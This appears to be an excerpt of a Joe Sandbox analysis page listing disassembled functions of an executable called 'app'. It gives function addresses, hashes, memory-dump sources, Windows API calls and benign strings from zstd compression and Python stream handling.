                                                                                                                                                                                                            • Instruction ID: 56cec77e9a2617d97f894f5298dad615abcca14ae5f44ad646a0ee4f0f976c5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d82fb9080f08f38887541d796cd93f6b84f8101b6940601e1502b8de02da7d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35316E3260E68299EB24EB61E8551F9B360FF88784F850135EA4D5BB65DF3CD1058710
                                                                                                                                                                                                            Function 00007FF8A7FFC0D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$DeallocErr_FormatRestoreSave
                                                                                                                                                                                                            • String ID: zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 297743732-2766032700
                                                                                                                                                                                                            • Opcode ID: 46db9aaf1c3cd0d54b271ae7e4578a149ee9a067833423865fe30fa87db66738
                                                                                                                                                                                                            • Instruction ID: 1f314130b24976d81b9f2e6c90d8276fe268bce1fb57e068269d0a0e1abb6dcb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46db9aaf1c3cd0d54b271ae7e4578a149ee9a067833423865fe30fa87db66738
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1315023A06F5196EA548B75E8443AA63A0FB49BE4F444232CF6E47790DF7CE4A2D304
                                                                                                                                                                                                            Function 00007FF8A7FF7160 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$DeallocErr_FormatRestoreSavememmove
                                                                                                                                                                                                            • String ID: zstd decompress error: %s
                                                                                                                                                                                                            • API String ID: 3058629171-3499397093
                                                                                                                                                                                                            • Opcode ID: f26f5b207dafcee2f4d68278a66905dc42ade9652660c986430f7571b3a9872c
                                                                                                                                                                                                            • Instruction ID: 1d8d4332f7d329f09bde2d0daf91aba7f70f467ce78448fa36239940f8efe694
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f26f5b207dafcee2f4d68278a66905dc42ade9652660c986430f7571b3a9872c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0231D422B0AB81A6DB54CF35E84036DB360FB89BD4F540232EB6D47795DF39E4A18704
                                                                                                                                                                                                            Function 00007FF7ACE82620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF7ACE82748
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                                            • Opcode ID: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction ID: e6f6eee56f05c49682eca42b02838a8d575fce1fde839ec727a98d34bd44ebd7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531527262EBC2A1E630AB10E4517EAB364FF84785FC14036E68D276A9DF3CD255CB50
                                                                                                                                                                                                            Function 00007FF8A7FFF7C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Object_String
                                                                                                                                                                                                            • String ID: data is NULL$offset in segments overflows buffer size$segments is NULL
                                                                                                                                                                                                            • API String ID: 2350702593-1550997492
                                                                                                                                                                                                            • Opcode ID: 68d6c774a6c90b809a900000a599135eb9a48d9ad810b4909557f20127a8a5a6
                                                                                                                                                                                                            • Instruction ID: a3e57b8ba21d82feb9bcbd9bf63de89017c2a9754875ec9e2c14c4b637cb3783
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d6c774a6c90b809a900000a599135eb9a48d9ad810b4909557f20127a8a5a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23219C22E1AB8292EA50CF24E44027C77A4FB99BC0F599271EA4D537A5DF7CE591C300
                                                                                                                                                                                                            Function 00007FF8A8004790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A80021CA), ref: 00007FF8A800480C
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8004828
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A80021CA), ref: 00007FF8A8004832
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A80021CA), ref: 00007FF8A800483B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • WARNING: The maximum dictionary size %u is too large compared to the source size %u! size(source)/size(dictionary) = %f, but it should be >= 10! This may lead to a subpar dictionary! We recommend training on sources at least 10x, and preferably 100x the size o, xrefs: 00007FF8A800481E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintf
                                                                                                                                                                                                            • String ID: WARNING: The maximum dictionary size %u is too large compared to the source size %u! size(source)/size(dictionary) = %f, but it should be >= 10! This may lead to a subpar dictionary! We recommend training on sources at least 10x, and preferably 100x the size o
                                                                                                                                                                                                            • API String ID: 3491404577-2467106354
                                                                                                                                                                                                            • Opcode ID: d823cdb00c502131a868b293c66d52049f2d2f570bc7fe9caf54b2663e797bc0
                                                                                                                                                                                                            • Instruction ID: 4db5f96665d82b1576c3ec654e6b9e058fbfc0574a849d5f3c03d6c9583ef2cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d823cdb00c502131a868b293c66d52049f2d2f570bc7fe9caf54b2663e797bc0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59113A11B1AE4155ED079725A015376D225FF96BC4F059335DD0F237D1EF3CA0614218
                                                                                                                                                                                                            Function 00007FF8A7FFB030 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$AttrCallMethod_SizeString
                                                                                                                                                                                                            • String ID: close$close$flush
                                                                                                                                                                                                            • API String ID: 1920181940-1798861123
                                                                                                                                                                                                            • Opcode ID: 3862c496a2c4cf2f1d781dd167bc6329b7fa57831657d8c94fbd03a1a89cc246
                                                                                                                                                                                                            • Instruction ID: 3b0c857ee2fcd8379d2446943a9748280945d0ecd74336602ed9169f471c535d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3862c496a2c4cf2f1d781dd167bc6329b7fa57831657d8c94fbd03a1a89cc246
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88015262A06A06A1FF144F35D89577837A0EB64BC8F444031C91D063E0DFBDE5E6D354
                                                                                                                                                                                                            Function 00007FF8A7FF6290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$AttrCallMethod_SizeString
                                                                                                                                                                                                            • String ID: close$close$flush
                                                                                                                                                                                                            • API String ID: 1920181940-1798861123
                                                                                                                                                                                                            • Opcode ID: a7cf4166dbfd22ab2755f2040d96e51c999b4a7064d51bebe70c81116ae3bedc
                                                                                                                                                                                                            • Instruction ID: 92e72886fcb58b8a713e38098e357a5ff587e9d018e4d331b11660267257b775
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cf4166dbfd22ab2755f2040d96e51c999b4a7064d51bebe70c81116ae3bedc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3015E61A0AA02A5FF508F76D8A533823A0EB18BCCF441034C90D063A4DFBDE5E9DB54
                                                                                                                                                                                                            Function 00007FF8A7FF61B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AttrErr_Object_
                                                                                                                                                                                                            • String ID: flush$flush$stream is closed
                                                                                                                                                                                                            • API String ID: 4053589530-2062273305
                                                                                                                                                                                                            • Opcode ID: 4b83381c8c89c131117e464fbb97b27c4c133075c8f1f37fb81f47585cc3d061
                                                                                                                                                                                                            • Instruction ID: af457d74c1b9b5e82108899ce34210cc4ddf77f0283476d3851828494b05491a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b83381c8c89c131117e464fbb97b27c4c133075c8f1f37fb81f47585cc3d061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0201FB61E0AA06A5EF148B66ECA133423A0EF58BD8F455035C90D4A2A0DF7CE5EAD758
                                                                                                                                                                                                            Function 00007FF7ACE98810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction ID: 60d9d95d3a6130d33c70eefa82176ddaa46a8fb77ca950c6324c67f5d670f9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F0AF71A1F742A5EA20AB20E844339D360BF897A2FD90735D56E662F0CF2CD008C720
                                                                                                                                                                                                            Function 00007FF8A7FF6230 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AttrErr_Object_
                                                                                                                                                                                                            • String ID: fileno$fileno$fileno not available on underlying writer
                                                                                                                                                                                                            • API String ID: 4053589530-1199412483
                                                                                                                                                                                                            • Opcode ID: a45da1b62e09e218edff39ce521ff2183f5b8009e7cb4f29878c77999793759c
                                                                                                                                                                                                            • Instruction ID: 4f2253f8d9fb79b157f885dc1fb7217769e71ff419ce05f24b441d41d3daa2b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45da1b62e09e218edff39ce521ff2183f5b8009e7cb4f29878c77999793759c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71F01C61B1A903A1EF108B66E8A167523A0EF58FC4F451031C90D4A2A0DF7CD5EAD765
                                                                                                                                                                                                            Function 00007FF8A7FFAFD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AttrErr_Object_
                                                                                                                                                                                                            • String ID: fileno$fileno$fileno not available on underlying writer
                                                                                                                                                                                                            • API String ID: 4053589530-1199412483
                                                                                                                                                                                                            • Opcode ID: 9eb0fa9dc4bed45b1a263e4300a0c93c68390550bc2f06d8638d169ded95e21d
                                                                                                                                                                                                            • Instruction ID: 56ce3ebf95f2ecffffcc2fb27b4e4d09d6e5bf9dfd1867bd1a4a0031356735f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9eb0fa9dc4bed45b1a263e4300a0c93c68390550bc2f06d8638d169ded95e21d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF01C61B16A03A1EF048B66E89167423A0EF58FD4F451031C91D4A2A4DF7CD5EAD354
                                                                                                                                                                                                            Function 00007FF8A80040F0 Relevance: 7.7, APIs: 6, Instructions: 202COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A800419E
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80041C3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A8004343
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80043BD
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80043E0
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80043EE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2190258309-0
                                                                                                                                                                                                            • Opcode ID: a2a83469705922e9133d5c8165e3506097a998d3fd342557b0f34acc66e02409
                                                                                                                                                                                                            • Instruction ID: 1d1ba762917365fafd35d9a67d8f6734afa44d3c0fa22a7c9492d7df2d9c8724
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2a83469705922e9133d5c8165e3506097a998d3fd342557b0f34acc66e02409
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E091BF22A1AF8595EE218B21A4013BA6360FF99BD4F085331DE9E137D4DF7CE4A18358
                                                                                                                                                                                                            Function 00007FF8A80119C0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocfreemallocmemset
                                                                                                                                                                                                            • String ID: @
